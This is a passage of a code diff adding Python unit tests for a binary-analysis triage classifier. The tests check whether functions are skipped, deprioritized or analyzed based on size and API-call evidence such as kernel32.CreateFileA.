classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_TINY_NO_API + + +def test_triage_classify_large_function_deprioritize(): + insns = [(0x500000 + i, "nop") for i in range(4096)] + extractor = FakeTriageExtractor( + names={0x500000: "sub_500000"}, + function_data={0x500000: {"bbs": {0x500000: insns}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x500000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.DEPRIORITIZE + assert result.reason == REASON_LARGE_COMPLEXITY + + +def test_triage_api_presence_prevents_tiny_skip(): + extractor = FakeTriageExtractor( + names={0x403000: "sub_403000"}, + function_data={ + 0x403000: { + "bbs": {0x403000: [(0x403000, "call"), (0x403001, "ret")]}, + "insn_features": {0x403000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x403000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.ANALYZE + + +def test_triage_api_feature_evidence_prevents_thunk_skip(): + extractor = FakeTriageExtractor( + names={0x404000: "sub_404000"}, + function_data={ + 0x404000: { + "bbs": {0x404000: [(0x404000, "jmp")]}, + "insn_features": {0x404000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x404000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.ANALYZE